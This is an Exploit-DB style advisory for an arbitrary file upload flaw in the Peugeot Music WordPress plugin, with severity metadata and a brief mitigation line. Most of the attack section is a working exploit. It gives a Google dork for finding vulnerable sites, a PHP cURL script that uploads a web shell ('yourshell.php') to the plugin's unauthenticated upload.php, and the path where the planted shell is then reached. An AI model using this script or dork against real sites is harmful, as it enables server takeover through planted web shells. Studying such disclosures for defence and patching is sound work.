Wordpress Plugin Peugeot Music - Arbitrary File Upload

vendor:

Peugeot Music Plugin

by:

Mr.7z

8.8

CVSS

HIGH

Arbitrary File Upload

434

CWE

Product Name: Peugeot Music Plugin

Affected Version From: 1

Affected Version To: 1

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Windows 10 64bit (Home Edition)

2018

WordPress Plugin Peugeot Music – Arbitrary File Upload

A vulnerability in the Peugeot Music Plugin for Wordpress allows an attacker to upload arbitrary files to the server. This is due to the lack of proper validation of the uploaded file. An attacker can exploit this vulnerability by sending a malicious file to the upload.php page via a POST request. The malicious file will then be uploaded to the server and can be accessed via the uploads directory.

Mitigation:

The vendor should ensure that all uploaded files are properly validated before being uploaded to the server.

Source

Exploit-DB raw data:

# Exploit Title: Wordpress Plugin Peugeot Music - Arbitrary File Upload
# Google Dork: inurl:/wp-content/plugins/peugeot-music-plugin/
# Date: 2018-05-23
# Exploit Author: Mr.7z
# Vendor Homepage: -
# Software Link: -
# Version: 1.0
# Tested on: Windows 10 64bit (Home Edition)

# Exploit: /wp-content/plugins/peugeot-music-plugin/js/plupload/examples/upload.php
# Vuln? {"jsonrpc" : "2.0", "result" : null, "id" : "id"}

# CSRF
<?php

$url = "http://target.com/wp-content/plugins/peugeot-music-plugin/js/plupload/examples/upload.php";
// put URL Here
$post = array
(
"file" => "@yourshell.jpg",
"name" => "yourshell.php"
);
$ch = curl_init ("$url");
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1;
rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch, CURLOPT_POST, 1);
@curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
$data = curl_exec ($ch);
curl_close ($ch);
echo $data;

?>

# For CSRF using php xampp.
# Shell Locate:
target.com/wp-content/plugins/peugeot-music-plugin/js/plupload/examples/uploads/yourshell.php

# Thanks To XaiSyndicate - Family Attack Cyber - HunterSec-Team -
# Typical Idiot Security [!]